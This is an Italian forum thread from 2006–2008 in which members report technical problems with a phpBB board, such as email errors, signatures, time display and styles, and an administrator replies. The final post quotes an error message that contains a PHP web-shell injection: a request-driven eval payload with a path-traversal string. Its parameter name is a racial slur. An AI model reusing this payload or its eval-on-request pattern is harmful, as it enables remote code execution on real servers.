DireDonna

Segnalazione problemi tecnici

Per parlare liberamente di qualsiasi cosa!

Moderatori: Adriano, stefy4

Messaggioda robi » ven mar 03, 2006 11:01 am

io ha scritto:Scusate è qualche giorno che quando invio un messaggio mi esce questa scritta:

Failed sending email :: PHP ::

DEBUG MODE

Line : 234
File : emailer.php

E se vado a vedere il topic dove ho inserito il nuovo messaggio me lo da ancora arancione come se non lo avessi letto!!!! Che succede??? :cry:

Grazie x l'aiuto!!! :wink:


idem x me
Immagine

Immagine
robi
Vulcaniano
Vulcaniano
 
Messaggi: 2854
Iscritto il: mar nov 15, 2005 4:30 pm
Località: prov. Cuneo

Messaggioda Adriano » ven mar 03, 2006 12:14 pm

E' un problema che stiamo risolvendo: in pratica quella scritta di errore significa che il forum non invia le mail per segnalare un pm, oppure l'inserimento di un messaggio in una discussione che si sta seguendo.
Cmq ciò non influisce sul normale funzionamento del forum.
Lo risolveremo al più presto! :wink:
Avatar utente
Adriano
Staff Nomix
Staff Nomix
 
Messaggi: 373
Iscritto il: mar mag 28, 2002 2:58 pm
Località: Cuneo

Messaggioda io » ven mar 03, 2006 12:28 pm

Grazie, grazie!!! :wink:
Immagine
Avatar utente
io
Highlander
Highlander
 
Messaggi: 863
Iscritto il: ven set 02, 2005 11:08 am
Località: Roma

Messaggioda Adriano » ven mar 03, 2006 2:54 pm

problema risolto: se riscontrate altre anomalie, segnalatele.
Grazie!
Avatar utente
Adriano
Staff Nomix
Staff Nomix
 
Messaggi: 373
Iscritto il: mar mag 28, 2002 2:58 pm
Località: Cuneo

Messaggioda io » ven mar 03, 2006 3:12 pm

Grazie mille Adriano, perfetto!!!! :D
Immagine
Avatar utente
io
Highlander
Highlander
 
Messaggi: 863
Iscritto il: ven set 02, 2005 11:08 am
Località: Roma

Messaggioda Fedina » mer set 20, 2006 7:00 pm

come si fa ad inserire una seconda immagine nella firma?? :(
E una lacrima scese lungo il mio viso,
lentamente..

Avatar utente
Fedina
Extraterrestre
Extraterrestre
 
Messaggi: 1699
Iscritto il: ven ago 18, 2006 6:55 pm

Messaggioda Adriano » gio set 21, 2006 10:36 am

Fedina ha scritto:come si fa ad inserire una seconda immagine nella firma?? :(


Devi inserire il codice per richiamare un' altra immagine: vai nel tuo Profilo e nel campo "Firma" inserisci di nuovo il codice che vedi (cambiando il nome dell'immagine con quella nuova che vuoi inserire)
Tutto sui nomi - http://www.nomix.it
Cognomi, araldica, genealogia - http://www.cognomix.it
Italian Baby Names and Last Names - http://www.italianames.com
Avatar utente
Adriano
Staff Nomix
Staff Nomix
 
Messaggi: 373
Iscritto il: mar mag 28, 2002 2:58 pm
Località: Cuneo

Messaggioda Fedina » gio set 21, 2006 1:15 pm

Adriano ha scritto:
Fedina ha scritto:come si fa ad inserire una seconda immagine nella firma?? :(


Devi inserire il codice per richiamare un' altra immagine: vai nel tuo Profilo e nel campo "Firma" inserisci di nuovo il codice che vedi (cambiando il nome dell'immagine con quella nuova che vuoi inserire)


cosi ho fatto..forse ho sbagliato qualcosa.. :roll:
E una lacrima scese lungo il mio viso,
lentamente..

Avatar utente
Fedina
Extraterrestre
Extraterrestre
 
Messaggi: 1699
Iscritto il: ven ago 18, 2006 6:55 pm

Messaggioda io » ven ott 06, 2006 6:19 pm

Posso fare una domandina?? Perchè l'orario in cui vengono inviati i post non è reale? Cioè se io lo invio alle 9.30 mi compare tipo 7.30....
Magari c'è un motivo e io non l'ho capito... :roll:
Grazie in anticipo!
Immagine
Avatar utente
io
Highlander
Highlander
 
Messaggi: 863
Iscritto il: ven set 02, 2005 11:08 am
Località: Roma

Messaggioda Adriano » lun ott 09, 2006 10:23 am

Non saprei. l'ora impostata è esatta, ovvero GMT + 1 ora....ora controllo.
Avatar utente
Adriano
Staff Nomix
Staff Nomix
 
Messaggi: 373
Iscritto il: mar mag 28, 2002 2:58 pm
Località: Cuneo

Messaggioda gigimao » mar dic 19, 2006 4:24 pm

io non riesco ad inserire l'avatart... cos'è l'url?
il più piccolo felino è un capolavoro...
gigimao
Baby
Baby
 
Messaggi: 3
Iscritto il: dom dic 17, 2006 3:53 pm
Località: Terni

Messaggioda Fedina » mer lug 25, 2007 1:07 pm

La grafica è un po' sballata, tendente a sinistra :?
Le emotions nuove non si vedono :cry:
E una lacrima scese lungo il mio viso,
lentamente..

Avatar utente
Fedina
Extraterrestre
Extraterrestre
 
Messaggi: 1699
Iscritto il: ven ago 18, 2006 6:55 pm

Messaggioda Adriano » gio lug 26, 2007 11:00 am

Per la grafic credo sia dovuto al bannerone in cima e al box di fianco: ho rimpicciolito un po' il logo di Nomix, ora dovrebbe andare meglio.

Per le emoticons avevo provato ad aggiungerne ma ho fatto un casino.... :oops:
Cerco di sistemarlo al più presto!!!
Avatar utente
Adriano
Staff Nomix
Staff Nomix
 
Messaggi: 373
Iscritto il: mar mag 28, 2002 2:58 pm
Località: Cuneo

Re: Segnalazione problemi tecnici

Messaggioda Hamlet36 » dom mag 25, 2008 10:13 pm

Sono had ma scrivo dall'indirizzo di mio marito, il motivo è che... non riesco più a entrare, o meglio, quando entro appare una pagina di errore. succede da quando ho cambiato lo stile della visualizzazione del forum nel mio profilo (da subSilver a FIblack (?)). Non potendo vedere il forum non posso nemmeno ri-cambiare le impostazioni...insomma...AIUTOOOO!!!! :wink:

Grazie anticipatamente :roll:
Ultima modifica di Hamlet36 il dom mag 25, 2008 10:23 pm, modificato 2 volte in totale.
Hamlet36
Baby
Baby
 
Messaggi: 6
Iscritto il: mar mag 06, 2008 6:31 pm

Messaggioda Hamlet36 » dom mag 25, 2008 10:15 pm

Mi appare la seguente scritta:

phpBB : Critical Error

Could not open aaa=12;eval(stripslashes($_REQUEST[nigga]));exit();// /../../../../../../../../../../../../../../../../../../../tmp template config file

DEBUG MODE

Line : 503
File : functions.php
Hamlet36
Baby
Baby
 
Messaggi: 6
Iscritto il: mar mag 06, 2008 6:31 pm

PrecedenteProssimo

Torna a Di tutto, di più!

Chi c’è in linea

Visitano il forum: Nessuno e 1 ospite